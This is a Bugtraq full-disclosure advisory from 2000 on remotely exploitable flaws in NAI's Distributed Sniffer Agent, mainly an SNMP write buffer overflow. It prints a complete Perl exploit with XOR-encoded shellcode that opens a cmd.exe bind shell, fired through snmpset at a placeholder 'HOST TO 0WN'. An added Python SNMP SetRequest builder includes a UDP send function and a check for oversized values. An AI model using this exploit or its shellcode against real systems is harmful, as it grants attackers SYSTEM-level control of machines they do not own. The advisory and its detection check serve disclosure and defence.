Bugtraq mailing list archives
Remotely exploitable buffer overflow in NAI's Distributed Sniffer Agent
From: Kevin Start <kevin_start () HUSHMAIL COM>
Date: Thu, 2 Nov 2000 15:30:48 -0700
Bugtraq.

This 'advisory' details a number of problems with NAI's sniffer product. They have fixed the problems in current versions on the sly, so I have foregone notifying the vendor. They saw fit to post an advisory on Microsoft's Netmon today, so 'all is fair in love and war'; at least MS had the dignity to announce their fixes. As a side note, I was working with the vulnhelp team at SecurityFocus but have decided to just post this given NAI's recent decision to throw rocks in this great glass house....

Date Published: November 2, 2000
Advisory ID: N/A
Bugtraq ID: N/A
CVE CAN: None currently assigned.
Title: Remotely exploitable buffer overflow and protocol vulnerabilities in NAI's Distributed Sniffer Agent
Class: Boundary Error Condition (Buffer Overflow)
Remotely Exploitable: Yes
Locally Exploitable: Yes

Vulnerability Description:
NAI's Distributed Sniffer Agent can be overflowed remotely to gain SYSTEM privilege. Additional vulnerabilities in the management protocol allow an attacker to recover logins and passwords, take control of the agent, and delete logs.

Vulnerable Packages/Systems:
Systems running the NAI Sniffer Agent. Tested with Agent version 3.0.10 on Windows NT Workstation 4.0 SP6.

Solution/Vendor Information/Workaround:
Fixed in current versions. Additionally, advisories and information on security issues in Network Associates products can be obtained from:
http://www.securityfocus.com/bid/1606
http://www.securityfocus.com/bid/1589
etc, etc, etc, etc.

Vendor notified on: Right about now....

Credits:
This advisory was drafted with the help of the SecurityFocus.com Vulnerability Help Team. For more information or assistance drafting advisories please mail vulnhelp () securityfocus com.

Technical Description - Exploit/Concept Code:

1. The most severe problem is an overflow during SNMP writes. NAI elected to use a single community string for both read and write access (the conventional 'public'/'private' split), so an attacker only has to brute-force one string to get write access.
Once this string has been guessed, shellcode can be written into any writable object (sysName, for example). The receiving buffer is 256 bytes long, and there are no character restrictions: NUL bytes are allowed because the value is sent in hex mode as an SNMP OCTET STRING, which is length-prefixed rather than NUL-terminated. Since SNMP runs over UDP and no reply is needed, the attack can be launched completely blind with a single spoofed UDP packet. SYSTEM privilege can be gained using this method.

2. Authentication is handled using base64-encoded logins and passwords. dsniff by Dug Song already includes a module for capturing logins and passwords sent to the agent. Base64 encoding is also used to obfuscate changes to the agent's user database.

3. All remote access to the agent is handled over UDP. Once a legitimate user has authenticated to the agent, an attacker can inject his own spoofed commands. Full control of the agent can be gained in this manner. If the packet generation facility is enabled, a packet flood can be initiated.

4. All data transferred from the agent is in cleartext, allowing an attacker to recover data being sniffed on a remote network segment.

5. Flooding the agent with false login requests can cause system instability; a kernel fault was caused during testing.

6. Logs can be deleted remotely, allowing an attacker to delete his own brute-forcing attempts once he is successful.

--- EXPLOIT ---

#!/usr/bin/perl
# exploit for NAI Sniffer Agent 3.0.10
# Silently patched in later versions, although customers
# were not notified. No workaround was ever released.

# Listening port for the bind shell: 4369 (0x1111), each byte XORed with 0x99
# because the tail of the egg is XOR-0x99 encoded and decoded by the stub at
# its front.
$xoredport = "88 88 ";

# Shellcode ("egg"): decoder stub, API resolution, then the XOR-encoded
# table of KERNEL32/WSOCK32 names, a sockaddr_in containing $xoredport,
# and "cmd.exe", terminated by ff ff ff ff.
$egg = " eb 07 90 aa 1c 9c 77 90 90 90 33 c0 50 f7 d0 50 59 f2 af 59 b1 c6 8b c7 48 80 30 99 e2 fa 60 8d 85 70 fe ff ff 50 68 01 01 00 00 bb 77 be 6b 77 ff d3 61 90 90 90 90 33 f6 96 bb 99 3c 60 47 c1 eb 08 56 ff 13 8b d0 fc 33 c9 b1 0b 49 32 c0 ac 84 c0 75 f9 52 51 56 52 b3 40 ff 13 ab 59 5a e2 ec 32 c0 ac 84 c0 75 f9 b3 3c 56 ff 13 8b d0 fc 33 c9 b1 06 32 c0 ac 84 c0 75 f9 52 51 56 52 b3 40 ff 13 ab 59 5a e2 ec 83 c6 05 33 c0 50 40 50 40 50 ff 57 e8 93 6a 10 56 53 ff 57 ec 6a 02 53 ff 57 f0 33 c0 57 50 b0 0c ab 58 ab 40 ab 5f 48 50 57 56 ad 56 ff 57 c0 48 50 57 ad 56 ad 56 ff 57 c0 48 b0 44 89 07 57 ff 57 c4 33 c0 8b 46 f4 89 47 3c 89 47 40 8b 06 89 47 38 33 c0 66 b8 01 01 89 47 2c 57 57 33 c0 50 50 50 40 50 48 50 50 ad 56 33 c0 50 ff 57 c8 ff 76 f0 ff 57 cc ff 76 fc ff 57 cc 48 50 50 53 ff 57 f4 8b d8 33 c0 b4 04 50 c1 e8 04 50 ff 57 d4 8b f0 33 c0 8b c8 b5 04 50 50 57 51 50 ff 77 a8 ff 57 d0 83 3f 01 7c 22 33 c0 50 57 ff 37 56 ff 77 a8 ff 57 dc 0b c0 74 2f 33 c0 50 ff 37 56 53 ff 57 f8 6a 50 ff 57 e0 eb c8 33 c0 50 b4 04 50 56 53 ff 57 fc 57 33 c9 51 50 56 ff 77 ac ff 57 d8 6a 50 ff 57 e0 eb aa 50 ff 57 e4 90 d2 dc cb d7 dc d5 aa ab 99 da eb fc f8 ed fc c9 f0 e9 fc 99 de fc ed ca ed f8 eb ed ec e9 d0 f7 ff f6 d8 99 da eb fc f8 ed fc c9 eb f6 fa fc ea ea d8 99 da f5 f6 ea fc d1 f8 f7 fd f5 fc 99 c9 fc fc f2 d7 f8 f4 fc fd c9 f0 e9 fc 99 de f5 f6 fb f8 f5 d8 f5 f5 f6 fa 99 ce eb f0 ed fc df f0 f5 fc 99 cb fc f8 fd df f0 f5 fc 99 ca f5 fc fc e9 99 dc e1 f0 ed c9 eb f6 fa fc ea ea 99 ce ca d6 da d2 aa ab 99 ea f6 fa f2 fc ed 99 fb f0 f7 fd 99 f5 f0 ea ed fc f7 99 f8 fa fa fc e9 ed 99 ea fc f7 fd 99 eb fc fa ef 99 9b 99 $xoredport 99 99 99 99 99 99 99 99 99 99 99 99 fa f4 fd b7 fc e1 fc 99 ff ff ff ff ";

$offset    = "00 c7 12 00 ";       # return address (little-endian 0x0012c700), repeated to cover the saved EIP
$snmpset   = "/usr/bin/snmpset";
$community = "public";             # the single read/write community string
$objid     = "system.sysName.0";   # any writable object works; sysName is convenient
$offcount  = 80;
$nopcount  = 200;

# Value written to sysName: return-address sled, NOP sled, then the egg.
# Wrapped in double quotes so the shell hands snmpset one hex-string argument.
@sploitstring = ("\" ", $offset x $offcount, "90 " x $nopcount, $egg, " \"");

$host = "HOST TO 0WN";
# 'x' tells snmpset the value is a hex string, so NUL bytes pass through.
exec("$snmpset $host $community $objid x @sploitstring");
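The SNMP write in item 1 above, as an added example (not code from the advisory or from NAI): a minimal SNMPv1 SetRequest builder and parser in BER, plus a check that flags OCTET STRING writes longer than the agent's buffer. It shows why hex mode has no character restrictions (an OCTET STRING is length-prefixed, so NUL bytes are ordinary payload) and why one datagram is enough. The 256-byte limit is the sysName buffer size the advisory reports; the sample value is constructed and is not the exploit payload; the OID and tags are standard SNMPv1.

```python
"""
Minimal SNMPv1 SetRequest builder/parser (BER) with an oversize-value check.
Added example for the advisory above; not the advisory's or NAI's code.
"""
import socket

INTEGER, OCTET_STRING, OID, SEQUENCE = 0x02, 0x04, 0x06, 0x30
SET_REQUEST = 0xA3                        # SetRequest-PDU, context tag [3]
SYS_NAME_0 = (1, 3, 6, 1, 2, 1, 1, 5, 0)  # system.sysName.0
AGENT_BUFFER = 256                        # sysName buffer size per the advisory


def ber_len(n):
    """BER length: short form below 128, long form (0x8N + N bytes) otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, payload):
    return bytes([tag]) + ber_len(len(payload)) + payload


def ber_int(v):
    """Non-negative INTEGER; the extra leading byte keeps the sign bit clear."""
    return tlv(INTEGER, v.to_bytes((v.bit_length() + 8) // 8, "big"))


def ber_oid(arcs):
    out = [40 * arcs[0] + arcs[1]]        # first two arcs share one byte
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:                        # base-128 with continuation bits
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return tlv(OID, bytes(out))


def build_set_request(community, oid, value, request_id=1):
    """Message { version 0, community, SetRequest { id, 0, 0, varbinds } }.
    `value` travels as an OCTET STRING, so NUL bytes are fine: BER carries an
    explicit length, which is exactly what snmpset's hex mode relies on."""
    varbind = tlv(SEQUENCE, ber_oid(oid) + tlv(OCTET_STRING, value))
    pdu = tlv(SET_REQUEST, ber_int(request_id) + ber_int(0) + ber_int(0)
              + tlv(SEQUENCE, varbind))
    return tlv(SEQUENCE, ber_int(0) + tlv(OCTET_STRING, community) + pdu)


def parse_tlv(buf, pos=0):
    """Return (tag, payload, position after the element)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def parse_set_request(pkt):
    """Return (community, request_id, [(oid_bytes, value_tag, value), ...])."""
    tag, msg, _ = parse_tlv(pkt)
    if tag != SEQUENCE:
        raise ValueError("not an SNMP message")
    _, _version, p = parse_tlv(msg)
    _, community, p = parse_tlv(msg, p)
    pdu_tag, pdu, _ = parse_tlv(msg, p)
    if pdu_tag != SET_REQUEST:
        raise ValueError("not a SetRequest")
    _, rid, p = parse_tlv(pdu)
    _, _status, p = parse_tlv(pdu, p)
    _, _index, p = parse_tlv(pdu, p)
    _, vbl, _ = parse_tlv(pdu, p)
    varbinds, p = [], 0
    while p < len(vbl):
        _, vb, p = parse_tlv(vbl, p)
        _, oid_bytes, q = parse_tlv(vb)
        vtag, value, _ = parse_tlv(vb, q)
        varbinds.append((oid_bytes, vtag, value))
    return community, int.from_bytes(rid, "big"), varbinds


def oversized_set_values(pkt, limit=AGENT_BUFFER):
    """Detection check: OCTET STRING writes longer than the agent's buffer."""
    _, _, varbinds = parse_set_request(pkt)
    return [(oid, len(v)) for oid, vtag, v in varbinds
            if vtag == OCTET_STRING and len(v) > limit]


def send_set(pkt, host, port=161):
    """One UDP datagram, reply ignored: the attack in the advisory is blind.
    (Source spoofing would need a raw socket; this plain sendto does not spoof.)"""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.sendto(pkt, (host, port))


if __name__ == "__main__":
    # Constructed stand-in for an overlong value: 300 NOPs plus four NUL bytes.
    value = b"\x90" * 300 + b"\x00" * 4
    pkt = build_set_request(b"public", SYS_NAME_0, value)
    print(len(pkt), oversized_set_values(pkt))
```

Run over captured UDP/161 traffic, `oversized_set_values` is the check a sensor would apply: a SetRequest whose OCTET STRING value exceeds the target's buffer is worth an alert regardless of which object it names.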